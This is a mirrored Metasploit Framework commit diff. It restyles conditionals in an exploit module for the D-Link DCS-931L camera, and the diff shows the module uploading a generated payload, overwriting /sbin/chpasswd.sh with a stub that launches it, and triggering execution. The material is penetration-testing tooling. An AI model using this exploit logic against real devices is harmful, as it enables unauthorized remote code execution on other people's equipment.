mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Use unless instead of if !
This commit is contained in:
parent
7907c93047
commit
7259d2a65c
@ -68,16 +68,21 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||
def check
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri('uploadfile.htm'),
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']))
|
||||
if !res
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']
|
||||
))
|
||||
|
||||
unless res
|
||||
vprint_status("#{peer} - The connection timed out.")
|
||||
return Exploit::CheckCode::Unknown
|
||||
elsif res && res.code && res.code == 404
|
||||
end
|
||||
|
||||
if res.code && res.code == 404
|
||||
vprint_status("#{peer} - uploadfile.htm does not exist")
|
||||
return Exploit::CheckCode::Safe
|
||||
elsif res && res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS-931L"/
|
||||
elsif res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS\-931L"/
|
||||
vprint_error("#{peer} - Authentication failed")
|
||||
return Exploit::CheckCode::Detected
|
||||
elsif res && res.code && res.code == 200 && res.body && res.body =~ /Upload File/
|
||||
elsif res.code && res.code == 200 && res.body && res.body =~ /Upload File/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
@ -88,11 +93,14 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||
|
||||
# upload payload
|
||||
res = upload(payload_path, generate_payload_exe)
|
||||
if !res
|
||||
|
||||
unless res
|
||||
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
|
||||
elsif res && res.code && res.code == 404
|
||||
end
|
||||
|
||||
if res.code && res.code == 404
|
||||
fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
|
||||
elsif res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
|
||||
elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
|
||||
print_good("#{peer} - Payload uploaded successfully")
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload")
|
||||
@ -101,11 +109,14 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||
|
||||
# overwrite /sbin/chpasswd.sh with stub
|
||||
res = upload('/sbin/chpasswd.sh', "#!/bin/sh\n#{payload_path}&\n")
|
||||
if !res
|
||||
|
||||
unless res
|
||||
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
|
||||
elsif res && res.code && res.code == 404
|
||||
end
|
||||
|
||||
if res.code && res.code == 404
|
||||
fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
|
||||
elsif res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
|
||||
elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
|
||||
print_good("#{peer} - Stager uploaded successfully")
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager")
|
||||
@ -121,11 +132,14 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||
'ReplyErrorPage' => 'errradv.htm',
|
||||
'ConfigSystemAdmin' => 'Apply'
|
||||
}.to_a.shuffle])
|
||||
if !res
|
||||
|
||||
unless res
|
||||
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
|
||||
elsif res && res.code && res.code == 401
|
||||
end
|
||||
|
||||
if res.code && res.code == 401
|
||||
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
|
||||
elsif res && res.code && res.code == 200 && res.body
|
||||
elsif res.code && res.code == 200 && res.body
|
||||
print_good("#{peer} - Payload executed successfully")
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed")
|
||||
|
Loading…
Reference in New Issue
Block a user